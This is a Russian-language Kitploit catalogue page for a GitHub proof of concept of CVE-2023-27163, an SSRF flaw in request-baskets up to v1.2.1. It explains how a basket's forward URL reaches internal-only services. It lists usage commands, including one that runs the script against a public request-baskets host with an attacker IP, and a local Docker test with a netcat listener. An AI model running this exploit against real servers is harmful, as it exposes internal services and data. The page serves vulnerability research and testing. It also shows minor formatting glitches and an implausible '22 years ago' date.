Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-27163 — Доказательство концепции для Server Side Request Forgery (SSRF) в request-baskets (V<= v.1.2.1) | Kitploit
Инструменты/GitHubGitHub/mastercode112/cve-2023-27163
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubmastercode112/cve-2023-27163

CVE-2023-27163

Доказательство концепции для Server Side Request Forgery (SSRF) в request-baskets (V<= v.1.2.1)

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Доказательство концепции SSRF в Request-Baskets (CVE-2023-27163)

Этот репозиторий содержит доказательство концепции (PoC) для CVE-2023-27163 — уязвимости подделки запросов на стороне сервера (Server-Side Request Forgery, SSRF), обнаруженной в request-baskets вплоть до версии 1.2.1. Данная уязвимость позволяет злоумышленникам получать доступ к сетевым ресурсам и конфиденциальной информации, эксплуатируя компонент /api/baskets/{name} с помощью специально сформированного API-запроса.

Использование

root@kitploit:~
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>

Как это работает?

Request-baskets — это веб-приложение, предназначенное для сбора и регистрации запросов по определённому маршруту, так называемой корзине (basket). При её создании пользователь может указать другой сервер для пересылки запроса. Проблема здесь в том, что пользователь может указать не предназначенные для этого сервисы, например приложения, закрытые от внешней сети.

Например, предположим, что на сервере размещены Request-baskets (порт 55555) и веб-сервер Flask на порту 8000. Flask также настроен на взаимодействие только с localhost. Создав корзину, которая пересылает запросы на http://localhost:8000, злоумышленник может получить доступ к ранее ограниченному веб-серверу Flask.

Тестирование на localhost

Изображение PoC

  1. Запустите Docker-контейнер Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git

2. Скачайте PoC

```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
  1. Ожидайте подключения
root@kitploit:~
nc -lvp 8000
  1. Сохраните IP-адрес Docker-хоста
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Запустите PoC
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
Скачать инструмент